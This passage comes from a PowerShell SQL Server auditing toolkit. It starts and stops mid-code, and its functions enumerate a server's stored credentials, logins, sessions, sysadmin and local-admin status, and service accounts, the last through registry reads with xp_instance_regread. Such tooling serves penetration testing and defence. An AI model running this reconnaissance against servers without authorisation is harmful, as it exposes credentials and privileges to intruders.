config_value\n\n                        if ($IsShowAdvancedEnabled2 -eq 1)\n                        {\n                            $DisableShowAdvancedOptions = 1\n                            if(-not $SuppressVerbose)\n                            {\n                                Write-Verbose -Message \"$Instance : Enabled Show Advanced Options.\"\n                            }\n                        }\n                        else\n                        {\n                            if(-not $SuppressVerbose)\n                            {\n                                Write-Verbose -Message \"$Instance : Enabling Show Advanced Options failed. Aborting.\"\n                            }\n                        }\n                    }\n                }\n\n                # Run sp_confgiure\n                Get-SQLQuery -Instance $Instance -Query 'sp_configure' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose |\n                ForEach-Object -Process {\n                    $SettingName = $_.name\n                    $SettingMin = $_.minimum\n                    $SettingMax = $_.maximum\n                    $SettingConf_value = $_.config_value\n                    $SettingRun_value = $_.run_value\n\n                    $null = $TblResults.Rows.Add($ComputerName, $Instance, $SettingName, $SettingMin, $SettingMax, $SettingConf_value, $SettingRun_value)\n                }\n\n                # Restore Show Advanced Options state if needed\n                if($DisableShowAdvancedOptions -eq 1 -and $IsSysadmin -eq 'Yes')\n                {\n                    if(-not $SuppressVerbose)\n                    {\n                        Write-Verbose -Message \"$Instance : Disabling Show Advanced Options\"\n                    }\n                    $Configurations = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options',0;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n                }\n\n                # Close connection\n                $Connection.Close()\n\n                # Dispose connection\n                $Connection.Dispose()\n            }\n            catch\n            {\n                # Connection failed\n                if(-not $SuppressVerbose)\n                {\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                    #Write-Verbose  \" Error: $ErrorMessage\"\n                }\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblResults\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerCredential\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerCredential\n{\n    <#\n            .SYNOPSIS\n            Returns credentials from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerCredential -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName        : SQLServer1\n            Instance            : SQLServer1\\STANDARDDEV2014\n            credential_id       : 65536\n            CredentialName      : MyUser\n            credential_identity : Domain\\MyUser\n            create_date         : 5/5/2016 11:16:12 PM\n            modify_date         : 5/5/2016 11:16:12 PM\n            target_type         :\n            target_id           :\n            [TRUNCATED]\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerCredential -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Credential name.')]\n        [string]$CredentialName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        $TblCredentials = New-Object -TypeName System.Data.DataTable\n\n        # Setup CredentialName filter\n        if($CredentialName)\n        {\n            $CredentialNameFilter = \" WHERE name like '$CredentialName'\"\n        }\n        else\n        {\n            $CredentialNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  USE master;\n            SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            credential_id,\n            name as [CredentialName],\n            credential_identity,\n            create_date,\n            modify_date,\n            target_type,\n            target_id\n            FROM [master].[sys].[credentials]\n        $CredentialNameFilter\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append results\n        $TblCredentials = $TblCredentials + $TblResults\n    }\n\n    End\n    {\n        # Return data\n        $TblCredentials\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerLogin\n# ----------------------------------\nFunction  Get-SQLServerLogin\n{\n    <#\n            .SYNOPSIS\n            Returns logins from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER PrincipalName\n            Pincipal name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerLogin -Instance SQLServer1\\STANDARDDEV2014 | Select-Object -First 1\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            PrincipalId   : 1\n            PrincipalName : sa\n            PrincipalSid  : 1\n            PrincipalType : SQL_LOGIN\n            CreateDate    : 4/8/2003 9:10:35 AM\n            IsLocked      : 0\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerLogin -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Principal name to filter for.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblLogins = New-Object -TypeName System.Data.DataTable\n        $null = $TblLogins.Columns.Add('ComputerName')\n        $null = $TblLogins.Columns.Add('Instance')\n        $null = $TblLogins.Columns.Add('PrincipalId')\n        $null = $TblLogins.Columns.Add('PrincipalName')\n        $null = $TblLogins.Columns.Add('PrincipalSid')\n        $null = $TblLogins.Columns.Add('PrincipalType')\n        $null = $TblLogins.Columns.Add('CreateDate')\n        $null = $TblLogins.Columns.Add('IsLocked')\n\n        # Setup CredentialName filter\n        if($PrincipalName)\n        {\n            $PrincipalNameFilter = \" and name like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  USE master;\n            SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],principal_id as [PrincipalId],\n            name as [PrincipalName],\n            sid as [PrincipalSid],\n            type_desc as [PrincipalType],\n            create_date as [CreateDate],\n            LOGINPROPERTY ( name , 'IsLocked' ) as [IsLocked]\n            FROM [sys].[server_principals]\n            WHERE type = 'S' or type = 'U' or type = 'C'\n        $PrincipalNameFilter\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Update sid formatting for each record\n        $TblResults |\n        ForEach-Object -Process {\n            # Format principal sid\n            $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','')\n            if ($NewSid.length -le 10)\n            {\n                $Sid = [Convert]::ToInt32($NewSid,16)\n            }\n            else\n            {\n                $Sid = $NewSid\n            }\n\n            # Add results to table\n            $null = $TblLogins.Rows.Add(\n                [string]$_.ComputerName,\n                [string]$_.Instance,\n                [string]$_.PrincipalId,\n                [string]$_.PrincipalName,\n                $Sid,\n                [string]$_.PrincipalType,\n                $_.CreateDate,\n            [string]$_.IsLocked)\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblLogins\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLSession\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLSession\n{\n    <#\n            .SYNOPSIS\n            Returns active sessions from target SQL Servers.  Sysadmin privileges is required to view all sessions.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLSession -Instance SQLServer1\\STANDARDDEV2014 | Select-Object -First 1\n\n            ComputerName          : SQLServer1\n            Instance              : SQLServer1\\STANDARDDEV2014\n            PrincipalSid          : 010500000000000515000000F3864312345716CC636051C017100000\n            PrincipalName         : Domain\\MyUser\n            OriginalPrincipalName : Domain\\MyUser\n            SessionId             : 51\n            SessionStartTime      : 06/24/2016 09:26:21\n            SessionLoginTime      : 06/24/2016 09:26:21\n            SessionStatus         : running\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLSession -Verbose\n            .EXAMPLE\n            PS C:\\> (Get-SQLSession -Instance SQLServer1\\STANDARDDEV2014).count\n            48\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'PrincipalName.')]\n        [string]$PrincipalName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblSessions = New-Object -TypeName System.Data.DataTable\n        $null = $TblSessions.Columns.Add('ComputerName')\n        $null = $TblSessions.Columns.Add('Instance')\n        $null = $TblSessions.Columns.Add('PrincipalSid')\n        $null = $TblSessions.Columns.Add('PrincipalName')\n        $null = $TblSessions.Columns.Add('OriginalPrincipalName')\n        $null = $TblSessions.Columns.Add('SessionId')\n        $null = $TblSessions.Columns.Add('SessionStartTime')\n        $null = $TblSessions.Columns.Add('SessionLoginTime')\n        $null = $TblSessions.Columns.Add('SessionStatus')\n\n        # Setup PrincipalName filter\n        if($PrincipalName)\n        {\n            $PrincipalNameFilter = \" and login_name like '$PrincipalName'\"\n        }\n        else\n        {\n            $PrincipalNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges to view sessions that aren't yours.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  USE master;\n            SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            security_id as [PrincipalSid],\n            login_name as [PrincipalName],\n            original_login_name as [OriginalPrincipalName],\n            session_id as [SessionId],\n            last_request_start_time as [SessionStartTime],\n            login_time as [SessionLoginTime],\n            status as [SessionStatus]\n            FROM    [sys].[dm_exec_sessions]\n            ORDER BY status\n        $PrincipalNameFilter\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Update sid formatting for each record\n        $TblResults |\n        ForEach-Object -Process {\n            # Format principal sid\n            $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','')\n            if ($NewSid.length -le 10)\n            {\n                $Sid = [Convert]::ToInt32($NewSid,16)\n            }\n            else\n            {\n                $Sid = $NewSid\n            }\n\n            # Add results to table\n            $null = $TblSessions.Rows.Add(\n                [string]$_.ComputerName,\n                [string]$_.Instance,\n                $Sid,\n                [string]$_.PrincipalName,\n                [string]$_.OriginalPrincipalName,\n                [string]$_.SessionId,\n                [string]$_.SessionStartTime,\n                [string]$_.SessionLoginTime,\n            [string]$_.SessionStatus)\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblSessions\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLSysadminCheck\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLSysadminCheck\n{\n    <#\n            .SYNOPSIS\n            Check if login is has sysadmin privilege on the target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLSysadminCheck -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName   Instance                       IsSysadmin\n            ------------   --------                       ----------\n            SQLServer1     SQLServer1\\STANDARDDEV2014     Yes\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLStoredProcure -Verbose -NoDefaults\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Data for output\n        $TblSysadminStatus = New-Object -TypeName System.Data.DataTable\n\n        # Setup CredentialName filter\n        if($CredentialName)\n        {\n            $CredentialNameFilter = \" WHERE name like '$CredentialName'\"\n        }\n        else\n        {\n            $CredentialNameFilter = ''\n        }\n\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"SELECT    '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            CASE\n            WHEN IS_SRVROLEMEMBER('sysadmin') =  0 THEN 'No'\n            ELSE 'Yes'\n        END as IsSysadmin\"\n\n        # Execute Query\n        $TblSysadminStatusTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append results\n        $TblSysadminStatus = $TblSysadminStatus + $TblSysadminStatusTemp\n    }\n\n    End\n    {\n        # Return data\n        $TblSysadminStatus\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLLocalAdminCheck\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLLocalAdminCheck\n{\n    <#\n            .SYNOPSIS\n            Check if the current Windows user is running in a local adminsitrator context.\n            PS C:\\> Get-SQLLocalAdminCheck\n\n            $true\n    #>\n    Begin\n    {\n    }\n\n    Process\n    {\n        # Get current windows user\n        $WinCurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n\n        # Get current windows username\n        $WinCurrentUserName = $WinCurrentUser.name\n\n        # Get current windows user's groups\n        $WinGroups = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($WinCurrentUser)\n\n        # Check if the current windows user/groups are local administrators / process is elevated\n        $WinRoleCheck = [System.Security.Principal.WindowsBuiltInRole]::Administrator        \n\n        # Return true or false\n        $WinGroups.IsInRole($WinRoleCheck)\n    }\n\n    End\n    {\n    }\n}\n\n# ----------------------------------\n#  Get-SQLServiceAccount\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServiceAccount\n{\n    <#\n            .SYNOPSIS\n            Returns a list of service account names for SQL Servers services by querying the registry with xp_regread.  This can be executed against remote systems.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLServiceAccount -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName     : SQLServer1\n            Instance         : SQLServer1\\STANDARDDEV2014\n            DBEngineLogin    : LocalSystem\n            AgentLogin       : NT Service\\SQLAgent$STANDARDDEV2014\n            BrowserLogin     : NT AUTHORITY\\LOCALSERVICE\n            WriterLogin      : LocalSystem\n            AnalysisLogin    : NT Service\\MSOLAP$STANDARDDEV2014\n            ReportLogin      : NT Service\\ReportServer$STANDARDDEV2014\n            IntegrationLogin : NT Service\\MsDtsServer120\n\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLServiceAccount -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblServiceAccount = New-Object -TypeName System.Data.DataTable\n    }\n\n    Process\n    {\n        # Note: Tables queried by this function typically require sysadmin privileges.\n\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Get sysadmin status\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n        if($IsSysadmin -eq 'Yes')\n        {\n            $SysadminSetup = \"\n                -- Get SQL Server Browser - Static Location\n                EXECUTE       master.dbo.xp_instance_regread\n                @rootkey      = N'HKEY_LOCAL_MACHINE',\n                @key          = N'SYSTEM\\CurrentControlSet\\Services\\SQLBrowser',\n                @value_name   = N'ObjectName',\n                @value        = @BrowserLogin OUTPUT\n\n                -- Get SQL Server Writer - Static Location\n                EXECUTE       master.dbo.xp_instance_regread\n                @rootkey      = N'HKEY_LOCAL_MACHINE',\n                @key          = N'SYSTEM\\CurrentControlSet\\Services\\SQLWriter',\n                @value_name   = N'ObjectName',\n                @value        = @WriterLogin OUTPUT\n\n                -- Get MSOLAP - Calculated\n                EXECUTE\t\tmaster.dbo.xp_instance_regread\n                N'HKEY_LOCAL_MACHINE', @MSOLAPInstance,\n                N'ObjectName',@AnalysisLogin OUTPUT\n\n                -- Get Reporting - Calculated\n                EXECUTE\t\tmaster.dbo.xp_instance_regread\n                N'HKEY_LOCAL_MACHINE', @ReportInstance,\n                N'ObjectName',@ReportLogin OUTPUT\n\n                -- Get SQL Server DTS Server / Analysis - Calulated\n                EXECUTE\t\tmaster.dbo.xp_instance_regread\n                N'HKEY_LOCAL_MACHINE', @IntegrationVersion,\n            N'ObjectName',@IntegrationDtsLogin OUTPUT\"\n\n            $SysadminQuery = '\t,[BrowserLogin] = @BrowserLogin,\n                [WriterLogin] = @WriterLogin,\n                [AnalysisLogin] = @AnalysisLogin,\n                [ReportLogin] = @ReportLogin,\n            [IntegrationLogin] = @IntegrationDtsLogin'\n        }\n        else\n        {\n            $SysadminSetup = ''\n            $SysadminQuery = ''\n        }\n\n        # Define Query\n        $Query = \"  -- Setup variables\n            DECLARE\t\t@SQLServerInstance\tVARCHAR(250)\n            DECLARE\t\t@MSOLAPInstance\t\tVARCHAR(250)\n            DECLARE\t\t@ReportInstance \tVARCHAR(250)\n            DECLARE\t\t@AgentInstance\t \tVARCHAR(250)\n            DECLARE\t\t@IntegrationVersion\tVARCHAR(250)\n            DECLARE\t\t@DBEngineLogin\t\tVARCHAR(100)\n            DECLARE\t\t@AgentLogin\t\tVARCHAR(100)\n            DECLARE\t\t@BrowserLogin\t\tVARCHAR(100)\n            DECLARE     \t@WriterLogin\t\tVARCHAR(100)\n            DECLARE\t\t@AnalysisLogin\t\tVARCHAR(100)\n            DECLARE\t\t@ReportLogin\t\tVARCHAR(100)\n            DECLARE\t\t@IntegrationDtsLogin\tVARCHAR(100)\n\n            -- Get Service Paths for default and name instance\n            if @@SERVICENAME = 'MSSQLSERVER' or @@SERVICENAME = HOST_NAME()\n            BEGIN\n            -- Default instance paths\n            set @SQLServerInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER'\n            set @MSOLAPInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQLServerOLAPService'\n            set @ReportInstance = 'SYSTEM\\CurrentControlSet\\Services\\ReportServer'\n            set @AgentInstance = 'SYSTEM\\CurrentControlSet\\Services\\SQLSERVERAGENT'\n            set @IntegrationVersion  = 'SYSTEM\\CurrentControlSet\\Services\\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0'\n            END\n            ELSE\n            BEGIN\n            -- Named instance paths\n            set @SQLServerInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSSQL$' + cast(@@SERVICENAME as varchar(250))\n            set @MSOLAPInstance = 'SYSTEM\\CurrentControlSet\\Services\\MSOLAP$' + cast(@@SERVICENAME as varchar(250))\n            set @ReportInstance = 'SYSTEM\\CurrentControlSet\\Services\\ReportServer$' + cast(@@SERVICENAME as varchar(250))\n            set @AgentInstance = 'SYSTEM\\CurrentControlSet\\Services\\SQLAgent$' + cast(@@SERVICENAME as varchar(250))\n            set @IntegrationVersion  = 'SYSTEM\\CurrentControlSet\\Services\\MsDtsServer'+ SUBSTRING(CAST(SERVERPROPERTY('productversion') AS VARCHAR(255)),0, 3) + '0'\n            END\n\n            -- Get SQL Server - Calculated\n            EXECUTE\t\tmaster.dbo.xp_instance_regread\n            N'HKEY_LOCAL_MACHINE', @SQLServerInstance,\n            N'ObjectName',@DBEngineLogin OUTPUT\n\n            -- Get SQL Server Agent - Calculated\n            EXECUTE\t\tmaster.dbo.xp_instance_regread\n            N'HKEY_LOCAL_MACHINE', @AgentInstance,\n            N'ObjectName',@AgentLogin OUTPUT\n\n            $SysadminSetup\n\n            -- Dislpay results\n            SELECT\t\t'$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            [DBEngineLogin] = @DBEngineLogin,\n            [AgentLogin] = @AgentLogin\n        $SysadminQuery\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append results\n        $TblServiceAccount = $TblServiceAccount + $TblResults\n    }\n\n    End\n    {\n        # Return data\n        $TblServiceAccount\n    }\n}\n\n# ----------------------------------\n#  Get-SQLAgentJob\n# ----------------------------------\n# Author: Leo Loobeek and Scott Sutherland\nFunction  Get-SQLAgentJob\n{\n    <#\n            .SYNOPSIS\n            This function will check the current login's privileges and return a list\n            of the jobs they have privileges to view.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER ProxyCredential\n            Only return SQL Agent jobs using a specific proxy credential.\n            .PARAMETER UsingProxyCredential\n            Only return SQL Agent jobs using a proxy credentials.\n            .PARAMETER SubSystem\n            Only return SQL Agent jobs for specific subsystems.\n            .PARAMETER Keyword\n            Only return SQL Agent jobs that have a command that includes a specific keyword.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .EXAMPLE\n             PS C:\\> Get-SQLInstanceLocal | Get-SQLAgentJob -Verbose -Username sa -Password 'Password123!' | select Instance, Job_name, Step_name, SubSystem, Command | ft\n            VERBOSE: SQL Server Agent Job Search Starting...\n            VERBOSE: MSSQLSRV04\\BOSCHSQL : Connection Failed.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : Connection Success.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : - SQL Server Agent service enabled.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : - Attempting to list existing agent jobs as sa.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2014 : - 4 agent jobs found.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2016 : Connection Success.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2016 : - SQL Server Agent service has not been started.\n            VERBOSE: MSSQLSRV04\\SQLSERVER2016 : - Attempting to list existing agent jobs as sa.\n            VERBOSE: 